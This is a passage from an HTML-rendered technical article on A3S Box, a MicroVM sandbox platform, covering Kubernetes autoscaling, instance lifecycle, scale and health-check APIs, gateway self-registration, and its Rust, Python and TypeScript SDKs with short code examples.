&lt;td&gt;CPU usage percentage&lt;/td&gt;
&lt;td&gt;70%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Memory&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Memory usage percentage&lt;/td&gt;
&lt;td&gt;80%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Inflight&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Current concurrent requests&lt;/td&gt;
&lt;td&gt;50&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Rps&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requests per second&lt;/td&gt;
&lt;td&gt;1000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Custom&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Custom metrics (Prometheus query)&lt;/td&gt;
&lt;td&gt;Scenario-dependent&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
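&lt;p&gt;For the utilization-style metrics, the scaling arithmetic can be sketched with the classic ratio formula the Kubernetes HPA uses: &lt;code&gt;desired = ceil(current × observed / target)&lt;/code&gt;, clamped to the replica bounds. How BoxAutoscaler combines multiple metrics is not specified above; taking the maximum across metrics, as below, is an assumption:&lt;/p&gt;

```rust
// HPA-style desired-replica calculation. Each (observed, target) pair is one
// metric; the most demanding metric wins, then the result is clamped.
fn desired_replicas(current: u32, observed_vs_target: &[(f64, f64)], min: u32, max: u32) -> u32 {
    let desired = observed_vs_target
        .iter()
        .map(|(observed, target)| ((current as f64) * observed / target).ceil() as u32)
        .max()
        .unwrap_or(current); // no metrics: keep the current replica count
    desired.clamp(min, max)
}
```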

&lt;h3&gt;
  
  
  18.4 Instance Lifecycle
&lt;/h3&gt;

&lt;p&gt;In Kubernetes integration, each MicroVM instance goes through the following state transitions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Creating -&amp;gt; Booting -&amp;gt; Ready -&amp;gt; Busy -&amp;gt; Draining -&amp;gt; Stopping -&amp;gt; Stopped
                        ^       |
                        +-------+
                                         v (abnormal)
                                       Failed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;State meanings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Creating&lt;/strong&gt;: Instance configuration generated, resources being allocated&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Booting&lt;/strong&gt;: MicroVM starting (kernel boot, Guest Init initialization)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ready&lt;/strong&gt;: Instance ready, can receive traffic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Busy&lt;/strong&gt;: Instance processing a request&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Draining&lt;/strong&gt;: Instance draining existing requests (graceful transition before scale-down)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stopping&lt;/strong&gt;: Instance shutting down&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stopped&lt;/strong&gt;: Instance stopped&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Failed&lt;/strong&gt;: Instance terminated abnormally&lt;/li&gt;
&lt;/ul&gt;
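&lt;p&gt;A controller enforcing this lifecycle can validate transitions with a simple state machine. A sketch reading the legal edges off the diagram above (treating &lt;code&gt;Failed&lt;/code&gt; as reachable from any non-terminal state, and allowing &lt;code&gt;Ready&lt;/code&gt; as well as &lt;code&gt;Busy&lt;/code&gt; to enter &lt;code&gt;Draining&lt;/code&gt;, are assumptions):&lt;/p&gt;

```rust
#[derive(Clone, Copy, PartialEq, Debug)]
enum InstanceState { Creating, Booting, Ready, Busy, Draining, Stopping, Stopped, Failed }

// Returns whether a lifecycle transition is legal.
fn can_transition(from: InstanceState, to: InstanceState) -> bool {
    use InstanceState::*;
    match (from, to) {
        (Creating, Booting)
        | (Booting, Ready)
        | (Ready, Busy) | (Busy, Ready)        // serving loop
        | (Ready, Draining) | (Busy, Draining) // graceful wind-down
        | (Draining, Stopping)
        | (Stopping, Stopped) => true,
        (Stopped, _) | (Failed, _) => false,   // terminal states
        (_, Failed) => true,                   // abnormal termination
        _ => false,
    }
}
```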

&lt;h3&gt;
  
  
  18.5 Scale API
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;ScaleRequest&lt;/code&gt; and &lt;code&gt;ScaleResponse&lt;/code&gt; define the request/response protocol for scaling:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ScaleRequest&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;service&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;replicas&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;ScaleConfig&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// image, vcpus, memory_mib, env, port_map&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;request_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ScaleResponse&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;request_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;accepted&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;current_replicas&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;target_replicas&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;instances&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;InstanceInfo&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  18.6 Instance Health Checks
&lt;/h3&gt;

&lt;p&gt;Each instance continuously reports health status:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;InstanceHealth&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;cpu_percent&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;f32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;memory_bytes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;inflight_requests&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;healthy&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Health check data simultaneously drives:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;BoxAutoscaler scaling decisions&lt;/li&gt;
&lt;li&gt;Load balancer traffic distribution&lt;/li&gt;
&lt;li&gt;Alert system anomaly detection&lt;/li&gt;
&lt;/ul&gt;
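&lt;p&gt;As an illustration of the first consumer, here is a minimal, hypothetical scaling rule in Python. The dataclass mirrors the Rust &lt;code&gt;InstanceHealth&lt;/code&gt; struct above; the proportional policy and the 50% CPU target are assumptions for illustration, not BoxAutoscaler's actual algorithm:&lt;/p&gt;

```python
# Hypothetical sketch: fold per-instance health reports into a replica
# target. Mirrors the InstanceHealth struct above; thresholds and the
# proportional rule are assumptions, not A3S Box's real algorithm.
import math
from dataclasses import dataclass


@dataclass
class InstanceHealth:
    cpu_percent: float
    memory_bytes: int
    inflight_requests: int
    healthy: bool


def desired_replicas(reports, current, target_cpu=50.0):
    """Proportional scaling: desired = current * observed / target."""
    healthy = [h for h in reports if h.healthy]
    if not healthy:
        return max(current, 1)  # no data: hold steady rather than flap
    avg_cpu = sum(h.cpu_percent for h in healthy) / len(healthy)
    return max(1, math.ceil(current * avg_cpu / target_cpu))


reports = [
    InstanceHealth(90.0, 512 << 20, 40, True),
    InstanceHealth(70.0, 480 << 20, 35, True),
]
print(desired_replicas(reports, current=2))  # avg 80% vs target 50% -> 4
```

&lt;p&gt;The same reports can feed the load balancer (e.g. weighting by &lt;code&gt;inflight_requests&lt;/code&gt;) and the alert system (e.g. flagging &lt;code&gt;healthy == false&lt;/code&gt;) without a second collection path.&lt;/p&gt;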

&lt;h3&gt;
  
  
  18.7 Gateway Self-Registration
&lt;/h3&gt;

&lt;p&gt;After a MicroVM instance starts, it self-registers with A3S Gateway via &lt;code&gt;InstanceRegistration&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;InstanceRegistration&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;instance_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;service&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;endpoint&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="c1"&gt;// Instance access address&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;health&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;InstanceHealth&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;metadata&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;HashMap&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When an instance stops, it sends &lt;code&gt;InstanceDeregistration&lt;/code&gt; to cancel registration. This self-registration mechanism allows the Gateway to automatically discover and route to new instances without manual configuration.&lt;/p&gt;
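&lt;p&gt;The registration lifecycle can be sketched as a simplified Python model. The message shape mirrors &lt;code&gt;InstanceRegistration&lt;/code&gt;; the first-healthy routing policy is illustrative only, not the Gateway's actual load-balancing logic:&lt;/p&gt;

```python
# Simplified model of Gateway self-registration. The Registration shape
# mirrors InstanceRegistration above; the routing policy (first healthy
# instance of a service) is an assumption for illustration.
from dataclasses import dataclass, field


@dataclass
class Registration:
    instance_id: str
    service: str
    endpoint: str
    healthy: bool = True
    metadata: dict = field(default_factory=dict)


class Gateway:
    def __init__(self):
        self._instances = {}  # instance_id -> Registration

    def register(self, reg: Registration):
        self._instances[reg.instance_id] = reg

    def deregister(self, instance_id: str):
        # Corresponds to InstanceDeregistration on instance shutdown.
        self._instances.pop(instance_id, None)

    def route(self, service: str):
        """Return the endpoint of any healthy instance of `service`."""
        for reg in self._instances.values():
            if reg.service == service and reg.healthy:
                return reg.endpoint
        return None


gw = Gateway()
gw.register(Registration("vm-1", "api", "10.0.0.5:8080"))
print(gw.route("api"))    # 10.0.0.5:8080
gw.deregister("vm-1")
print(gw.route("api"))    # None
```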




&lt;h2&gt;
  
  
  19. SDK Ecosystem: Unified Rust, Python, and TypeScript
&lt;/h2&gt;

&lt;h3&gt;
  
  
  19.1 SDK Architecture
&lt;/h3&gt;

&lt;p&gt;A3S Box's SDK follows an "implement once, bind to multiple languages" architecture:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;+-----------------------------------------+
|              a3s-box-sdk (Rust)          |
|         Core: BoxSdk + BoxSandbox        |
+----------+------------+------------------+
|  Rust    |   Python   |  TypeScript      |
|  Native  |  PyO3      |  napi-rs         |
|  API     |  bindings  |  bindings        |
|          |  (async)   |  (async)         |
+----------+------------+------------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Core logic is implemented once in Rust, and native bindings are then generated via PyO3 (Python) and napi-rs (TypeScript/Node.js). This guarantees that all three SDKs behave identically while retaining Rust's performance and safety.&lt;/p&gt;

&lt;h3&gt;
  
  
  19.2 Rust SDK
&lt;/h3&gt;

&lt;p&gt;The Rust SDK is the lowest-level interface, providing complete type safety and zero-cost abstractions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;a3s_box_sdk&lt;/span&gt;&lt;span class="p"&gt;::{&lt;/span&gt;&lt;span class="n"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SandboxOptions&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="nd"&gt;#[tokio::main]&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Create SDK instance&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// None = use default home_dir&lt;/span&gt;

    &lt;span class="c1"&gt;// Create sandbox&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sdk&lt;/span&gt;&lt;span class="nf"&gt;.create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SandboxOptions&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"python:3.11"&lt;/span&gt;&lt;span class="nf"&gt;.to_string&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
        &lt;span class="n"&gt;vcpus&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;memory_mib&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="nn"&gt;Default&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="p"&gt;}))&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;// Execute command&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sandbox&lt;/span&gt;&lt;span class="nf"&gt;.exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s"&gt;"python"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"-c"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"print('hello')"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nd"&gt;println!&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"{}"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="py"&gt;.stdout&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="c1"&gt;// Sandbox is automatically cleaned up on drop&lt;/span&gt;
    &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(())&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  19.3 Python SDK
&lt;/h3&gt;

&lt;p&gt;The Python SDK bridges via PyO3, providing a Pythonic async interface:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;asyncio&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;a3s_box&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SandboxOptions&lt;/span&gt;

&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# Create SDK instance
&lt;/span&gt;    &lt;span class="n"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# Create sandbox
&lt;/span&gt;    &lt;span class="n"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sdk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;SandboxOptions&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python:3.11&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;vcpus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;memory_mib&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# Execute command
&lt;/span&gt;    &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sandbox&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-c&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;print(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;hello&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;asyncio&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key design decisions for PyO3 bindings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use &lt;code&gt;py.allow_threads&lt;/code&gt; to release the GIL, ensuring Rust's async operations don't block Python's event loop&lt;/li&gt;
&lt;li&gt;Maintain an internal Tokio Runtime to bridge Python's synchronous calls to Rust's async world&lt;/li&gt;
&lt;li&gt;Type mapping: Rust's &lt;code&gt;Result&amp;lt;T&amp;gt;&lt;/code&gt; -&amp;gt; Python exceptions, Rust's &lt;code&gt;Option&amp;lt;T&amp;gt;&lt;/code&gt; -&amp;gt; Python's &lt;code&gt;None&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
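&lt;p&gt;The bridging idea in the second bullet can be sketched from the Python side. Here a blocking function stands in for a GIL-releasing Rust FFI call (&lt;code&gt;_native_exec&lt;/code&gt; is a stand-in, not the real binding); offloading it keeps the event loop responsive, analogous to what the SDK's internal Tokio runtime achieves:&lt;/p&gt;

```python
# Sketch of the sync-to-async bridging pattern, from the Python side.
# _native_exec is a stand-in for a Rust FFI call that releases the GIL;
# it is NOT the real a3s_box binding.
import asyncio
import time


def _native_exec(cmd):
    time.sleep(0.05)  # simulate work done inside the Rust core
    return f"ran: {' '.join(cmd)}"


async def exec_async(cmd):
    # asyncio.to_thread offloads the blocking call to a worker thread,
    # so the event loop stays free, mirroring how the binding's internal
    # Tokio runtime keeps Python's loop responsive.
    return await asyncio.to_thread(_native_exec, cmd)


async def main():
    # Two sandbox commands run concurrently instead of serially.
    out = await asyncio.gather(
        exec_async(["python", "-c", "print(1)"]),
        exec_async(["python", "-c", "print(2)"]),
    )
    print(out)


asyncio.run(main())
```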

&lt;h3&gt;
  
  
  19.4 TypeScript SDK
&lt;/h3&gt;

&lt;p&gt;The TypeScript SDK generates native Node.js modules via napi-rs:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;SandboxOptions&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;@a3s/box&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Create SDK instance&lt;/span&gt;
    &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

    &lt;span class="c1"&gt;// Create sandbox&lt;/span&gt;
    &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;sdk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
        &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;node:20&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="na"&gt;vcpus&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
